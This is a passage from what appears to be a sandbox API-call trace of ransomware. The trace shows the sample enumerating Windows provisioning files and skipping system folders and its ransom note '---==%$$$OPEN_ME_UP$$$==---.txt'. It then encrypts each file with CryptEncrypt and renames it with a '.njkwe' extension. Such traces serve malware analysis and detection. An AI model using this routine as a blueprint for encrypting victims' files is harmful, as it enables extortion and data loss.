d’Ivoire)_i2$(__MVID)@WAP.provxml", cAlternateFileName="547__C~1.PRO")) returned 1 [0081.985] lstrcmpiW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.985] lstrcmpiW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.985] lstrcmpiW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.985] lstrcmpiW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.985] lstrcmpiW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.985] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml") returned 166 [0081.985] StrStrIW (lpFirst="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.985] lstrcmpW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.985] lstrcmpW (lpString1="547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.985] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.985] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\547__connections_cellular_orange (côte d’ivoire)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.985] GetTickCount () returned 0x1154ce4 [0081.985] GetTickCount () returned 0x1154ce4 [0081.985] GetTickCount () returned 0x1154ce4 [0081.985] GetTickCount () returned 0x1154ce4 [0081.986] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.986] GetProcessHeap () returned 0xbe0000 [0081.986] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.986] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x355, lpOverlapped=0x0) returned 1 [0081.987] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.987] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x355, lpOverlapped=0x0) returned 1 [0081.987] GetProcessHeap () returned 0xbe0000 [0081.987] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.987] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.987] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.987] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.988] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.988] CloseHandle (hObject=0x444) returned 1 [0081.988] GetProcessHeap () returned 0xbe0000 [0081.988] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.988] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\547__connections_cellular_orange (côte d’ivoire)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\547__Connections_Cellular_Orange (Côte d’Ivoire)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\547__connections_cellular_orange (côte d’ivoire)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.988] GetProcessHeap () returned 0xbe0000 [0081.989] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.989] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913b7a34, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913b7a34, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913b7a34, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", cAlternateFileName="548__C~1.PRO")) returned 1 [0081.989] lstrcmpiW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.989] lstrcmpiW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.989] lstrcmpiW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.989] lstrcmpiW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.989] lstrcmpiW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.989] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml") returned 166 [0081.989] StrStrIW (lpFirst="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.989] lstrcmpW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.989] lstrcmpW (lpString1="548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.989] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.989] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\548__connections_cellular_orange (côte d’ivoire)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.989] GetTickCount () returned 0x1154ce4 [0081.989] GetTickCount () returned 0x1154ce4 [0081.989] GetTickCount () returned 0x1154ce4 [0081.989] GetTickCount () returned 0x1154ce4 [0081.989] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.989] GetProcessHeap () returned 0xbe0000 [0081.990] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.990] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0081.993] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.993] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0081.993] GetProcessHeap () returned 0xbe0000 [0081.993] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.993] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.993] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.993] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.993] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.994] CloseHandle (hObject=0x444) returned 1 [0081.994] GetProcessHeap () returned 0xbe0000 [0081.994] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.994] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\548__connections_cellular_orange (côte d’ivoire)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\548__Connections_Cellular_Orange (Côte d’Ivoire)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\548__connections_cellular_orange (côte d’ivoire)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.994] GetProcessHeap () returned 0xbe0000 [0081.994] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.994] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913b7a34, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913b7a34, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913b7a34, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", cAlternateFileName="549__C~1.PRO")) returned 1 [0081.994] lstrcmpiW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.994] lstrcmpiW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.995] lstrcmpiW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.995] lstrcmpiW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.995] lstrcmpiW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.995] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml") returned 158 [0081.995] StrStrIW (lpFirst="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.995] lstrcmpW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.995] lstrcmpW (lpString1="549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.995] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.995] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\549__connections_cellular_orange (kenya)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.995] GetTickCount () returned 0x1154ce4 [0081.995] GetTickCount () returned 0x1154ce4 [0081.995] GetTickCount () returned 0x1154ce4 [0081.995] GetTickCount () returned 0x1154ce4 [0081.995] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.995] GetProcessHeap () returned 0xbe0000 [0081.995] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.995] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.997] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.997] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.997] GetProcessHeap () returned 0xbe0000 [0081.997] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.997] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.997] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.997] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.997] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.997] CloseHandle (hObject=0x444) returned 1 [0081.997] GetProcessHeap () returned 0xbe0000 [0081.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.997] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0081.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\549__connections_cellular_orange (kenya)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\549__Connections_Cellular_Orange (Kenya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\549__connections_cellular_orange (kenya)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.998] GetProcessHeap () returned 0xbe0000 [0081.998] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.998] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902ba650, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902ba650, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902ba650, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", cAlternateFileName="54__CO~1.PRO")) returned 1 [0081.998] lstrcmpiW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.998] lstrcmpiW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.998] lstrcmpiW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.998] lstrcmpiW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.998] lstrcmpiW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.998] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml") returned 156 [0081.998] StrStrIW (lpFirst="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.998] lstrcmpW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.998] lstrcmpW (lpString1="54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.998] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\54__connections_cellular_ctbc (brazil)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.999] GetTickCount () returned 0x1154ce4 [0081.999] GetTickCount () returned 0x1154ce4 [0081.999] GetTickCount () returned 0x1154ce4 [0081.999] GetTickCount () returned 0x1154ce4 [0081.999] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.999] GetProcessHeap () returned 0xbe0000 [0081.999] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.999] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0082.011] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.012] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0082.012] GetProcessHeap () returned 0xbe0000 [0082.012] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.012] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.012] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.012] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.012] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.012] CloseHandle (hObject=0x444) returned 1 [0082.012] GetProcessHeap () returned 0xbe0000 [0082.012] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.012] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connections_Cellular_CTBC 